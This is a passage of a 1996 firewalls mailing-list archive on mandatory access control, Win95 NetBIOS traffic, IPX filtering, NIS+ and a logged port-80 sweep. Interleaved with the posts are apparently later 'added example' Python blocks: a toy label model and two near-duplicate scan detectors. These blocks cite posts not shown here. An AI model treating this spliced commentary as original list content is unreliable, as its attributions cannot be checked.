Jeromie Jackson
Garrison Associates
jeromie@garrison.com

p.s. I do not know if any firewalls implement this type of model/theory,
but it seems theoretically sound from the few mind blips I've had.
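The two label arguments above (Rick Smith's numbered steps, quoted by Jeromie, and Jeromie's two-level proxy layout) can be walked through in a toy Bell-LaPadula style label model. This is an added example, not code from Sidewinder or from any product or poster in this thread. It assumes that the inside interface carries the i.proxies' level '2' (the post implies this but does not state it), and that writes are permitted only at an equal label, which is the rule Jeromie's layout needs; textbook BLP, which allows writing up, is included as `strict=False` to show the difference:

```python
"""Toy MLS label model (Bell-LaPadula style) used to walk through two claims
in this thread: the "Internet Label" collapse (steps 4-5) and the two-level
proxy layout. Added example, not code from Sidewinder or any other product."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Label:
    level: int                               # hierarchical sensitivity level
    categories: frozenset = frozenset()      # non-hierarchical compartments

    def dominates(self, other):
        """a dominates b iff a.level >= b.level and a's categories include b's."""
        return self.level >= other.level and self.categories >= other.categories


def can_read(subject, obj):
    """Simple security property: a subject may read only what it dominates (no read up)."""
    return subject.dominates(obj)


def can_write(subject, obj, strict=True):
    """*-property. strict=True is the equal-label write rule assumed here (the
    rule the proxy layout needs); strict=False is textbook BLP, where a
    subject may write *up* to any label that dominates its own."""
    return subject == obj if strict else obj.dominates(subject)


def mac_separated(a, b, strict=True):
    """True if MAC blocks at least one direction of flow between labels a and b."""
    return not (can_read(a, b) and can_write(a, b, strict) and
                can_read(b, a) and can_write(b, a, strict))


def internet_label_collapse():
    """Steps 4-5: unlabeled Internet traffic gives every server the interface's
    label, so MAC cannot separate two such servers. Giving the port-25 and
    port-80 handlers distinct categories (the 'Mail' label idea) restores it."""
    internet = Label(1)
    mail = Label(1, frozenset({"mail"}))
    web = Label(1, frozenset({"web"}))
    return mac_separated(internet, internet), mac_separated(mail, web)


def proxy_layout_checks():
    """Layout: outside---o.proxies(1)----i.proxies(2)-----inside(2, assumed)."""
    outside_if = Label(1)
    o_proxy = Label(1)
    i_proxy = Label(2)
    inside_if = Label(2)
    return {
        "outer_proxy_reads_outside": can_read(o_proxy, outside_if),
        "inner_proxy_reads_outer": can_read(i_proxy, o_proxy),        # read down: allowed
        "outer_proxy_reads_inner": can_read(o_proxy, i_proxy),        # read up: denied
        "outer_proxy_writes_inside_strict": can_write(o_proxy, inside_if),
        "inner_proxy_writes_outer": can_write(i_proxy, o_proxy),      # write down: denied
        # caveat: under textbook BLP a level-1 proxy may write *up* to the
        # level-2 inside interface, so the layout depends on the strict rule
        "outer_proxy_writes_inside_textbook_blp": can_write(o_proxy, inside_if, strict=False),
    }


if __name__ == "__main__":
    same, categorised = internet_label_collapse()
    print("two servers at the same 'Internet Label' separated:", same)
    print("mail/web categories separated:", categorised)
    for name, allowed in proxy_layout_checks().items():
        print(f"{name}: {allowed}")
```

The last entry of `proxy_layout_checks()` is the one to watch: with plain BLP write-up allowed, a subverted o.proxy at level 1 could write straight to the level-2 inside interface, so the one-way flow the layout promises holds only on a system that confines writes to equal labels.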
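Glen Larwill's access-list log earlier in this digest shows one source sweeping a subnet on port 80 with one incrementing source port per target, and Bill Bunting's reply reads the timing as a tool at work. A detector for that pattern over Cisco IOS `%SEC-6-IPACCESSLOGP` lines, as an added example that is not code from either post or from any product in this thread: the sample lines are constructed from the posted ones with RFC 5737 documentation addresses in place of the masked X.X.* hosts, and the year (IOS timestamps carry none), the target threshold and the time window are assumptions:

```python
"""Horizontal-scan detector for Cisco IOS %SEC-6-IPACCESSLOGP log lines.
Added example modelled on the port-80 sweep posted to this list; not code
from that post or from any product named in the thread."""
import re
from collections import defaultdict
from datetime import datetime

# One IOS access-list log entry, e.g.
#   Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39620) -> 198.51.100.227(80), 1 packet
LOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2})(?:\.\d+)?: "
    r"%SEC-6-IPACCESSLOGP: list (?P<acl>\S+) (?P<action>permitted|denied) "
    r"(?P<proto>tcp|udp) (?P<src>[\d.]+)\((?P<sport>\d+)\) -> "
    r"(?P<dst>[\d.]+)\((?P<dport>\d+)\), (?P<count>\d+) packets?$"
)


def parse_line(line, year=1996):
    """Parse one log line into a dict, or return None for non-ACL lines.
    IOS timestamps carry no year, so the caller supplies one (1996 assumed)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{m['mon']} {m['day']} {year} {m['time']}", "%b %d %Y %H:%M:%S")
    return {"ts": ts, "acl": m["acl"], "action": m["action"], "proto": m["proto"],
            "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"]), "count": int(m["count"])}


def detect_horizontal_scans(lines, min_targets=8, window_seconds=600):
    """Return one finding per (source, proto, dst port) whose denied packets
    reached at least min_targets distinct destination hosts inside some
    window_seconds span. Repeat entries for a destination already seen (the
    router's later summary lines, or retransmits) do not count as new targets."""
    events = [e for e in map(parse_line, lines) if e and e["action"] == "denied"]
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["src"], e["proto"], e["dport"])].append(e)

    findings = []
    for (src, proto, dport), evs in by_key.items():
        first_seen = {}                                   # dst host -> first timestamp
        for e in sorted(evs, key=lambda e: e["ts"]):
            first_seen.setdefault(e["dst"], e["ts"])
        hits = sorted(first_seen.values())
        best, lo = 0, 0                                   # sliding window over first-seen times
        for hi in range(len(hits)):
            while (hits[hi] - hits[lo]).total_seconds() > window_seconds:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= min_targets:
            sports = sorted({e["sport"] for e in evs})
            findings.append({
                "src": src, "proto": proto, "dport": dport,
                "targets": len(first_seen), "max_in_window": best,
                # one source port per target, incrementing by one, is the
                # footprint of a tool walking the subnet rather than a person
                "sequential_source_ports": sports == list(range(sports[0], sports[0] + len(sports))),
                "first": hits[0], "last": hits[-1],
            })
    return findings


# Constructed sample modelled on the posted log, with RFC 5737 documentation
# addresses in place of the X.X.* hosts the poster masked.
SAMPLE_LINES = [
    "Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39620) -> 198.51.100.227(80), 1 packet",
    "Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39621) -> 198.51.100.243(80), 1 packet",
    "Jan 30 11:14:44.054: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39622) -> 198.51.100.3(80), 1 packet",
    "Jan 30 11:14:45.070: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39623) -> 198.51.100.19(80), 1 packet",
    "Jan 30 11:14:46.294: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39624) -> 198.51.100.35(80), 1 packet",
    "Jan 30 11:14:46.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39625) -> 198.51.100.51(80), 1 packet",
    "Jan 30 11:14:47.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39626) -> 198.51.100.67(80), 1 packet",
    "Jan 30 11:14:48.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39627) -> 198.51.100.83(80), 1 packet",
    "Jan 30 11:14:49.910: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39628) -> 198.51.100.99(80), 1 packet",
    "Jan 30 11:14:50.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39629) -> 198.51.100.115(80), 1 packet",
    # five minutes later the same (source port, target) pairs are logged again
    "Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39621) -> 198.51.100.243(80), 1 packet",
    "Jan 30 11:19:48.992: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39622) -> 198.51.100.3(80), 1 packet",
    # an unrelated single denied connection that must not be flagged
    "Jan 30 11:30:02.118: %SEC-6-IPACCESSLOGP: list 111 denied tcp 203.0.113.7(1034) -> 198.51.100.3(80), 1 packet",
    "%SYS-5-CONFIG_I: Configured from console by vty0",      # not an ACL entry, skipped
]


def run_example():
    return detect_horizontal_scans(SAMPLE_LINES)


if __name__ == "__main__":
    for f in run_example():
        print(f"{f['src']} swept {f['targets']} hosts on {f['proto']}/{f['dport']} "
              f"between {f['first']:%H:%M:%S} and {f['last']:%H:%M:%S}; "
              f"sequential source ports: {f['sequential_source_ports']}")
```

Counting distinct destinations rather than log lines is what keeps the five-minute repeat entries from inflating the score; the threshold and window are the knobs to tune against a site's own denied-traffic baseline.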
From firewalls-owner Thu Feb 1 16:27:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA07380 for firewalls-outgoing; Thu, 1 Feb 1996 16:07:47 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA07366 for ; Thu, 1 Feb 1996 16:07:41 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id SAA06751; Thu, 1 Feb 1996 18:06:40 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id SAA06747; Thu, 1 Feb 1996 18:06:40 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id SAA16728; Thu, 1 Feb 1996 18:07:14 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id SAA16504; Thu, 1 Feb 1996 18:07:15 -0600 Date: Thu, 1 Feb 1996 18:07:15 -0600 From: Rick Smith Message-Id: <199602020007.SAA16504@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, t-jont@microsoft.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jonathon Tidswell asks about some things, and I'll comment on the ones not already answered: >- TE is a MAC mechanism for providing least privilege Actually, it provides access control with respect to read, write, and execute so you have pretty fine control over what code gets executed when handling which data. This makes it easy to enforce integrity constraints on what is done to various data items. You can pretty much implement the Clark-Wilson integrity model with the mechanism. It also provides least privilege as a side effect. >Is there a common model or mechanism (other than TE) for least privilege in >B2 (and above) systems ? 
The only other one I've heard anything about is the integrity mechanism used in the old Honeywell SCOMP and probably in the HFSI/Wang XTS200 and 300 (Karen?). The mechanism is based on the Biba integrity model. There aren't that many B2/B3/A1 systems out there, so there aren't too many implemented alternatives. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Feb 1 19:08:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA14194 for firewalls-outgoing; Thu, 1 Feb 1996 18:59:01 -0800 (PST) Received: from crl.crl.com (crl.com [165.113.1.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA14188 for ; Thu, 1 Feb 1996 18:58:57 -0800 (PST) Received: by crl.crl.com id AA09605 (5.65c/IDA-1.5); Thu, 1 Feb 1996 18:46:58 -0800 Date: Thu, 1 Feb 1996 18:46:57 -0800 (PST) From: Tim Keanini To: Sick Puppy Cc: firewalls@GreatCircle.com Subject: Re: Windows 95 clobbering firewall? In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 1 Feb 1996, Sick Puppy wrote: > (Subject: Sick Puppy struggles to appear legitimate) > > I have a couple of sniffers in a network, one just inside the firewall > and the other right next to the network management system. > The last time I looked at these was about six weeks ago and when > looking today I see something new. > > The DNS running in the firewall used to get about 10 connects every 12 > hours from the company's internal mail system but now the firewall DNS is > getting about 10,800 connects every day from the network management > system (NMS). The sniffer watching the NMS shows that new Windows > 95 machines are connecting to it with NetBios on port 137, NetBios Name > Service. It looks like the NMS box in turn queries the firewall. 
>
> The firewall itself seems to be a Pentium machine, handling about 4,000
> incoming messages per day, 3,000 outgoing messages per day and a web user
> population of about 150 users.
>
> Two questions:
> 1) will the increased DNS queries cause the firewall performance
> (throughput/response time) to drop;
> 2) has anyone else seen a similar situation;
> 3) how would you stop these evil little Windows 95 weevils from
> nibbling away at the firewall DNS?

If you can afford to, you can configure the IP stack on the WIN95 (NT has the same problems out of the box) so that these NetBios services will not go anywhere near TCP/IP. I will leave this as an exercise to the reader, but I will hint that it has to deal with BIND'ing in the CONTROL PANEL:NETWORKS, and that if NETBIOS is BIND'ing to another protocol and then that protocol is anywhere near your TCP/IP settings, you have a transitive tunnel of NetBios tunneled in TCP/IP. Weak! I don't claim to be a WIN95/NT expert, but I do manage a lot of firewalls and have seen this from the first betas of WIN95.
:-)

--blast

From firewalls-owner Thu Feb 1 19:53:31 1996
Date: Thu, 1 Feb 1996 22:41:30 -0500
From: wojtek@solaris.tryc.on.ca (Wojciech Tryc)
Message-Id: <9602020341.AA05704@tryc.on.ca>
To: firewalls@GreatCircle.COM
Subject: HyperNews

I have created a HyperNews discussion about firewalls.
Please feel free to join http://www.tryc.on.ca/HyperNews/get/forums/firewalls.html

Sincerely,
Wojciech Tryc

From firewalls-owner Thu Feb 1 20:21:12 1996
From: Prakash N Purushotham
To: "'firewalls@greatcircle.com'"
Subject: X#.hosts in /etc directory
Date: Fri, 02 Feb 96 09:23:00 PST
Message-ID: <31124A6A@gangotri.mindware.soft.net>

Hi

Yesterday when I was backing up my DNS databases and Mail databases, I found several instances of files with names X0.hosts, X1.hosts .... X7.hosts. All these files were created on 27 Jan, 1996 (Saturday, a non-working day) with nearly the same time-stamps. Could this mean that my network is under attack? I did not find anything suspicious in the syslog and sulog files.
Request experts to comment.

TIA
Prakash
prakashp@mindware.soft.net

From firewalls-owner Thu Feb 1 20:38:30 1996
Message-Id: <9602020432.AB29764@sunny.health.state.mn.us>
From: "Elbert LaGrew"
Organization: Minnesota Dept. of Health
To: Firewalls@GreatCircle.COM
Date: Thu, 1 Feb 1996 22:33:16 -0600
Subject: Internet-access from Novell (reply)
Reply-To: elbert.lagrew@sunny.health.state.mn.us

> From: bressen@hks.net[SMTP:bressen@hks.net]
> Here's the worse problem I mentioned.
>
> I've grepped over 9000 archived articles of this group
> and found no mention of how to firewall novell boxes from
> each other.

[stuff deleted]

> How do I protect said client from, say, a disgruntled mailroom
> employee at the provider end, bent on hacking on the clients network?

[stuff deleted]

> Are there any IPX/SPX packet filters available?
>
> Are there any IPX proxy server firewalls available?
> Of course I'll start by recommending that the market data feed
> box go onto its own ethernet segment, and that IP traffic is
> not forwarded on or off of that segment.

Well, one of the simplest ways of isolating Netware LANs is through a router. On a Cisco, this is as simple as applying an access-list to the ethernet or serial port allowing or denying IPX traffic.
If the Netware server is set up for TCPIP, again, a simple access-list will do. Since Netware does all of its work using IPX/SPX, one need not worry too much about TCPIP traffic unless the server is running something like Netware IP or FlexIP, which acts like a software bridge and encapsulates IPX/SPX in IP traffic. SAP traffic can also be blocked in this manner.

Of course, this is not to take the place of a vigilant and thoughtful network administrator, who must make sure that passwords are changed, rights are secure, and that things are as they should be.

For a good overview on SAPs and IPX access-lists, see documentation at http://www.cisco.com. There are others, but they don't come to mind right now.

HTH
El

From firewalls-owner Thu Feb 1 21:38:25 1996
Message-ID: <9602020030.AA13691@databus.databus.com>
Date: Fri, 2 Feb 96 00:30 EST
From: Barney Wolff
To: firewalls@GreatCircle.com
Subject: Re: Windows 95 clobbering firewall?

> Date: Thu, 1 Feb 1996 13:53:21 -0500 (EST)
> From: Sick Puppy
>
> The DNS running in the firewall used to get about 10 connects every 12
> hours from the company's internal mail system but now the firewall DNS is
> getting about 10,800 connects every day from the network management
> system (NMS). The sniffer watching the NMS shows that new Windows
> 95 machines are connecting to it with NetBios on port 137, NetBios Name
> Service. It looks like the NMS box in turn queries the firewall.
>
> 2) has anyone else seen a similar situation;

Win95 (and NT) send subnet broadcasts on UDP port 137.
They may send unicasts to any host they have noticed. The broadcasts are how the "network neighborhood" folder gets populated. I have seen NT sending the subnet broadcast over a PPP link, which I thought really tacky. That was cured by turning off the "netbios helper" in NT (anecdotal).

> 3) how would you stop these evil little Windows 95 weevils from
> nibbling away at the firewall DNS?

Well, you could turn off netbios on the Win machines. Alternatively, you could stick a router between them and the NMS, which should isolate the NMS from the subnet broadcasts. That may or may not help, if the NMS is pinging the Win machines. I have a feeling that they're set up to try to talk to any IP address they notice. And if all else fails, run a caching-only name server on the NMS, so it doesn't have to bother the firewall every time. But really, named is pretty efficient, and 10K queries a day isn't anything to worry about.

Barney Wolff

From firewalls-owner Thu Feb 1 21:53:26 1996
Message-ID: <01BAF105.A7FE47A0@RWCooper.RC.Toronto.ON.CA>
From: "Russ.Cooper@RC.Toronto.on.ca"
To: "'Firewalls'"
Subject: FW: Windows 95 clobbering firewall?
Date: Fri, 2 Feb 1996 00:30:28 -0500

Install a Windows NT server and run WINS on it.
Then point all your Windows '95 machines to the NT box as their primary WINS server and they should stop broadcasting for DNS resolution of NetBios names (or so goes the theory, haven't sniffed the difference myself).

Basically, the Win95 machines are attempting to use their DNS connection via IP to resolve NetBios names. It would sound like they are running IP only. If you installed NetBeui in addition to IP, that would also resolve the DNS problems, as they would use NetBeui internally first, then go to IP if the name couldn't be resolved via NetBeui. Same holds true if you put IPX in addition to IP, but IPX has more potential security risks than a non-routable protocol like NetBeui. If you have more than one protocol installed on the machine, make sure that IP is not set as the "default" protocol.

As should be abundantly clear by now, what Microsoft knows about IP my fish forget over dinner. A WINS server is designed to help clean up the mess left by non-NT MS machines working with IP.

Let me know how it goes.
Cheers,
Russ Cooper, Senior Consultant - Internet
SHL/Computer Innovations - Consulting Services
Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com
"can someone tell me where to go today to get the money to go to where I want to go today"

From firewalls-owner Fri Feb 2 00:38:27 1996
Date: Fri, 02 Feb 96 08:34:44 GMT
From: "MCARDLE MARK"
Message-Id: <9601028232.AA823279053@dis.n-i.nhs.uk>
To: les@tracker.demon.co.uk, firewalls@greatcircle.com
Subject: Re[2]: firewall

Thanks for the reply Les.

My organisation provides IT infrastructure support and management to nearly 40 Health Service trusts. The DEC firewall is used to secure our point of access to the Internet; however, we may wish to implement packet filtering/logging between various LANs on our wide area network. We have Cray Enterprise routers which can provide packet filtering but no logging facility. The Digital screend program provides both packet filtering and logging. We aim to keep our Digital firewall (mainly to protect the Internet/WAN point of access) but also want to look at ways of securing individual LANs within our WAN. Something like screend or its functional equivalent running on a PC/Workstation might satisfy this requirement.

regards
mark...
______________________________ Reply Separator _________________________________
Subject: Re: firewall
Author: les@tracker.demon.co.uk at INTERNET_MAIL_GATEWAY
Date: 02/02/96 02:02

Hi Mark,

On Thu, 01 Feb 96 08:33:08 GMT, you wrote:

> Does anyone know of a version of screend that runs on either DGUX, AIX,
> HPUX or LINUX. We are currently using a Digital Firewall and are looking at
> the DGUX DSO containment firewall.

I think TIS Gauntlet and Raptor's Eagle run on AIX, and HP. Eagle runs on DGUX (intel) as well. Are you looking for a packet filter (like DEC's) or an application gateway? Why are you looking to change your firewall?

Cheers
...Les...

Les Carleton, Firewalling Consultant / "The Software Lifeguard"
These are my views ... not my employer's / les@tracker.demon.co.uk
"Open Standards ... Free Software ... Live Free or Fry!"

From firewalls-owner Fri Feb 2 05:30:41 1996
From: jon@london.hcsc.com (Jon Shallow)
Message-Id: <9602021310.AA16539@london.csd.harris.com>
Subject: Re: Most Secure Unix?
To: firewalls@GreatCircle.COM
Date: Fri, 2 Feb 96 13:10:01 GMT
In-Reply-To: ; from "Leroy Lacy" at Feb 1, 96 9:14 am

> Ian:
>
> well they are good products. The problem is that the systems are just
> TCP/IP firewalls and cost an arm and a leg.
> Most of the night hawks
> come in for around 100K.
>
> If we compete with them, we'll always have a good margin.
>
> Leroy

Leroy,

I suspect that this was sent to firewalls in error, but some confusion needs to be cleared up now that it has. The Harris Night Hawk is a symmetric multiple processing computer, the price varying according to configuration. The CyberGuard (Harris' firewall product) comes in for considerably less than 100K.

Regards
Jon
--
Jon Shallow, Harris Computer Systems Corporation
Jon.Shallow@mail.hcsc.com
Tel +44 (0) 1276 686886 Fax +44 (0) 1276 678733

From firewalls-owner Fri Feb 2 05:38:28 1996
From: Mark_W_Loveless@smtp.bnr.com
Date: Fri, 02 Feb 96 06:42:40 CST
Message-Id: <9601028232.AA823273660@smtp.bnr.com>
To: firewalls@greatcircle.com, netmgr02@cbe.ab.ca (Glen Larwill)
Subject: Re: Scanning from afar...

My first inclination is to say this is a web robot, a spider designed to locate web servers and then index their pages. Unless it grabbed stuff out of someone's table, I would think the IP scanning would be sequential. But I really suspect a spider. If it is home grown, that is what it is based off of. Do you have any web servers?
I'd make sure your robot.txt file is configured the way you want it -- you don't want a robot to index /etc/passwd and stick it out on a search engine server or something goofy like that ;-)

Mark_W_Loveless@smtp.bnr.com

______________________________ Reply Separator _________________________________
Subject: Scanning from afar...
Author: netmgr02@cbe.ab.ca (Glen Larwill) at internet
Date: 2/1/96 2:42 PM

Has anyone seen this type of network scanning before? Addresses have been changed to protect the innocent and the guilty.

Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet
Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet

From firewalls-owner Fri Feb 2 05:53:57 1996
From: Mark_W_Loveless@smtp.bnr.com
Date: Fri, 02 Feb 96 06:47:10 CST
Message-Id: <9601028232.AA823273665@smtp.bnr.com>
To: firewalls@GreatCircle.com, Sick Puppy
Subject: Re: Windows 95 clobbering firewall?

Look at how Netbios is configured on the Win95 boxes. It is probably tied to IP. I do not know how to unconfigure it, but I worked with someone after seeing this exact problem and they corrected it by unbinding Netbios from IP.

Mark_W_Loveless@smtp.bnr.com

______________________________ Reply Separator _________________________________
Subject: Windows 95 clobbering firewall?
Author: Sick Puppy at internet
Date: 2/1/96 8:10 PM

(Subject: Sick Puppy struggles to appear legitimate)

I have a couple of sniffers in a network, one just inside the firewall and the other right next to the network management system. The last time I looked at these was about six weeks ago and when looking today I see something new.

The DNS running in the firewall used to get about 10 connects every 12 hours from the company's internal mail system but now the firewall DNS is getting about 10,800 connects every day from the network management system (NMS). The sniffer watching the NMS shows that new Windows 95 machines are connecting to it with NetBios on port 137, NetBios Name Service. It looks like the NMS box in turn queries the firewall.

The firewall itself seems to be a Pentium machine, handling about 4,000 incoming messages per day, 3,000 outgoing messages per day and a web user population of about 150 users.

Two questions:
1) will the increased DNS queries cause the firewall performance (throughput/response time) to drop;
2) has anyone else seen a similar situation;
3) how would you stop these evil little Windows 95 weevils from nibbling away at the firewall DNS?

Yeah, I know. Dawgs have trouble counting.
Sick Puppy, the Cat_Eating_Dawg
Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter

From firewalls-owner Fri Feb 2 06:55:17 1996
Date: 2 Feb 1996 09:36:17 -0500
From: "Dan Vukelich"
Subject: Re: Internet-access from Nov
To: "elbert.lagrew@sunny.health.sta" , Firewalls@GreatCircle.COM

Reply to: RE>Internet-access from Novell (reply)

I haven't verified this, but I believe Morningstar does IPX filtering.
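The "Scanning from afar..." log lines Glen Larwill posted (quoted in Mark Loveless's reply earlier) are the kind of thing a small parser can watch for: one source touching many destinations on the same port. This is an added example, not code from any list member; the record layout is taken from the two lines on the page, and the extra log lines in it are constructed.

```python
"""Flag one-source, many-destinations probing in Cisco %SEC-6-IPACCESSLOGP lines.

Added example for the "Scanning from afar..." thread; not code from any list
member. The first two log lines below are the ones Glen Larwill posted
(addresses already masked as X.X); the rest are constructed for the example.
"""
import re
from collections import defaultdict

# Shape of an IOS access-list log line as it appears on the page, e.g.
# "Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp
#  X.X.143.14(39620) -> X.X.211.227(80), 1 packet"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d(?:\.\d+)?): %SEC-6-IPACCESSLOGP: "
    r"list (?P<acl>\S+) (?P<action>permitted|denied) (?P<proto>\w+) "
    r"(?P<src>[\w.]+)\((?P<sport>\d+)\) -> (?P<dst>[\w.]+)\((?P<dport>\d+)\), "
    r"(?P<count>\d+) packets?$"
)


def parse_line(line):
    """Return a dict of fields, or None if the line is not an IPACCESSLOGP record."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    for key in ("sport", "dport", "count"):
        rec[key] = int(rec[key])
    return rec


def find_sweeps(lines, min_targets=3):
    """Group denied hits by (source, destination port) and report sources that
    touched at least min_targets distinct destinations on one port.

    Returns {(src, dport): sorted list of destination addresses}.  Whether the
    source is a web spider (Loveless's guess) or a deliberate probe, the
    defender's follow-up is the same: check which of those hosts actually
    listen on that port and what they expose.
    """
    targets = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["action"] != "denied":
            continue
        targets[(rec["src"], rec["dport"])].add(rec["dst"])
    return {key: sorted(dsts) for key, dsts in targets.items() if len(dsts) >= min_targets}


# Constructed sample: Larwill's two lines, three constructed continuation lines
# from the same source, one constructed unrelated denial (must not be reported)
# and one non-ACL syslog line (must be ignored by the parser).
SAMPLE_LOG = """\
Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet
Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet
Jan 30 11:14:44.010: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39622) -> X.X.211.250(80), 1 packet
Jan 30 11:14:45.101: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39623) -> X.X.212.7(80), 1 packet
Jan 30 11:20:03.555: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.9.9(1025) -> X.X.211.227(23), 1 packet
Jan 30 11:21:00.000: %SYS-5-CONFIG_I: Configured from console by vty0
""".splitlines()


if __name__ == "__main__":
    for (src, port), dsts in find_sweeps(SAMPLE_LOG).items():
        print(f"{src} probed {len(dsts)} hosts on port {port}: {', '.join(dsts)}")
```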
From firewalls-owner Fri Feb 2 09:23:29 1996
Date: Fri, 2 Feb 96 08:36:12 PST
Message-Id: <9602021636.AA03693@osc.hitachi.com>
To: sgcccdc@citec.qld.gov.au (Colin Campbell)
From: Bill Stout
Subject: Re: How secure can a screened host be?
Cc: Firewalls@GreatCircle.COM

>> I have a theoretical configuration where I would like to use a screened
>> host, AND Cisco policy routing. The bennies would be the ability to
>> firewall multiple links with one router. My concern is the overall security
>> of such an arrangement in comparison to a true DMZ.
>>
>>   Business partner---Router----Internal Net(s)
>>                     /  |  \
>>          Internet--/   |   \---Firewall
>>                        |
>>                   Web Server(s)
>>
>
> My problem with this is that your firewall/bastion is neither logically
> nor physically between the internet router and the internal net(s).
> ...
> Colin

Same initial thoughts here. 'By the book firewall design' logic would state there are obvious design flaws here. But the books were written before Cisco introduced 'policy routing', where all traffic from specific ports is sent to a specific IP address, which would be the firewall. The logical layout would then be:

  Business partner
                  \
                   Firewall----Internal networks
                  /        \
          Internet          Web Servers

Any additional segments can be directed to the Firewall also.

BTW - This is a sanity check, I want to find errors with this configuration.

William B.
Stout
Senior Systems Administrator
Hitachi Data Systems
Open Systems Center
Santa Clara, California

From firewalls-owner Fri Feb 2 09:38:31 1996
Date: Sat, 3 Feb 1996 01:15:35 +0800
Message-Id: <199602021715.BAA00155@midian>
From: "Mikolaj J. Habryn"
To: matt@maverick.itd.uts.edu.au
CC: fina@novo.dk, firewalls@GreatCircle.COM
In-reply-to: <199602012132.IAA17213@maverick.itd.uts.edu.au> (matt@maverick.itd.uts.edu.au)
Subject: Re: NIS+

>>>>> "Jas" == Jas (Matthew K) writes:

Jas> Finn T Andersen wrote this...
>> There has been a lot of good information and suggestions about
>> NIS recently, however, no one has mentioned anything about NIS+.
>> I have heard that NIS+ should be a very secure system, but in
>> fact I have never heard about anyone who was using it. Is it
>> available, and on what platforms ?

Jas> yes, NIS+ is far more secure than NIS. It uses SecureRPC to
Jas> form the underlying basis of its security, and uses access
Jas> control lists for data in the tables (even down to individual
Jas> table entries. ie everyone owns their own passwd entry so you
Jas> can only see your own encrypted password field). it also
Jas> supports network encryption of certain fields (down to
Jas> individual entries within a table entry) on versions shipped
Jas> within the US.
Jas> SecureRPC is based on Diffie-Hellman for key

hi - i'm considering setting up a centralized password database for a local net consisting of linux/sun/next boxen - is NIS+ freely available, or is it proprietary? can you send me some pointers to any relevant info?

thanks for your time.

mjh

From firewalls-owner Fri Feb 2 10:12:11 1996
From: jgt10@amdahl.com (John G. Thompson)
Subject: Re: Mandatory protection (was: product selection)
To: firewalls@greatcircle.com
Date: Fri, 2 Feb 1996 09:56:17 -0800 (PST)
In-Reply-To: <9602012337.AA04194@garrison.com.> from "Jeromie Jackson" at Feb 1, 96 05:37:50 pm

Jeromie Jackson wrote:

> I would propose a different use for the MLS architecture.
>
>   outside---o.proxies----i.proxies-----inside
>
> o.proxies have level of '1'.
> i.proxies have level of '2'.
>
> o.proxies do not have access to write to the inside ethernet interface.
> i.proxies have privilege to read o.proxies based on label being
> dominant.
>
> From what I see, this would make a connection-based attack useless.
> You could break into the firewall and subvert the o.proxies. Data-based
> attacks could potentially succeed if neither proxy noticed the signature.
> Connection based attacks would be limited to harming the level '1' environment.
>
> I would be interested in hearing comments...

About 4 years ago I worked with a group of engineers to design an internet firewall using a B1 operating system. We thought of the above idea, almost exactly.

